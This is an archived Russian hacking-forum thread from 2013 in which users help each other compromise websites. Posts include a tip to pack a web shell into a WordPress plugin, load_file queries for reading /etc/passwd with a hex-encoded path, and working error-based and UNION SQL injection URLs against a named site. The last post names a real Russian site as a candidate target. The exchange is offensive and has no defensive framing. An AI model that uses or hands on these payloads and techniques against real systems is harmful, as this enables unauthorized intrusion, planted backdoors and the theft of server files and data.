ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

30.10.2013, 00:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 44130
Репутация:
26
|
|
Сообщение от qaz
qaz said:
несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
Через ред. шаблонов/тем. Но шаблоны хранятся в файловой системе, поэтому если нет прав на запись,то увы, нигде(если хочешь на всех).
|
|
|
|

30.10.2013, 00:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от qaz
qaz said:
несилён в ворд прессе, короче нет прав на запись, где в админке можно влепить хтмл код чтобы он на всех страницах отобразился?
в плагин шелл запакуй, если есть возможность загрузки на сайт
|
|
|
|

31.10.2013, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Как Havij проводит load_file? через программку /etc/passwd выводит норм, а вручную вывести что то неполучается
|
|
|
|

31.10.2013, 15:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Br@!ns
Br@!ns said:
Как Havij проводит load_file? через программку /etc/passwd выводит норм, а вручную вывести что то неполучается
Не знаю, как Havij, но, если у тебя mg=on, то load_file('/etc/passwd'), сам понимаешь, не пройдет. Здесь выручает hex: load_file(0x2f6574632f706173737764)
|
|
|
|

31.10.2013, 16:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Сообщение от YaBtr
YaBtr said:
Не знаю, как Havij, но, если у тебя mg=on, то load_file('/etc/passwd'), сам понимаешь, не пройдет. Здесь выручает hex:
load_file(0x2f6574632f706173737764)
При обоих вариантах получаю CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION db_name.loаd_file does not exist. до этого что то делал получал пустую страничку. В это же время Havij показывает и показывал все без проблем, вот и интересно, что он делает и как
|
|
|
|

31.10.2013, 16:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Br@!ns
Br@!ns said:
При обоих вариантах получаю CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION db_name.loаd_file does not exist. до этого что то делал получал пустую страничку. В это же время Havij показывает и показывал все без проблем, вот и интересно, что он делает и как
Если выводится пустая страница, смотри source страницы, зачастую там выводится.
|
|
|
|

31.10.2013, 21:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
|
|
|
|

31.10.2013, 22:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от Unknowhacker
Unknowhacker said:
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
а в чём собственно проблема?
Сообщение от None
http://www.friendlytarget.com/index.php?game=16%27+or+1+group+by+concat%28%28sel ect+version%28%29%29,0x00,floor%28rand%280%29*2%29 %29having+min%280%29+or+1--+
|
|
|
|

01.11.2013, 14:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
При единичном параметре пишет Unknown column '1' in 'order clause' http://www.friendlytarget.com/index.php?game=16%27+order+by+1+--+ что делать
Ситуация, когда один и тот же параметр учавствет в нескольких запросах: тыц
Union'ом можно крутить на другом уязвимом параметре:
Сообщение от None
www.friendlytarget.com/index.php?
type
=Action games'+union+select+1,2,version(),4,5,6,7,8+--+
|
|
|
|

05.11.2013, 22:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=88
Изменяя последнее число получаются разные ошибки, типа
http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=115
можно попробовать как то покрутить? или вообще в каком направлении идти?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|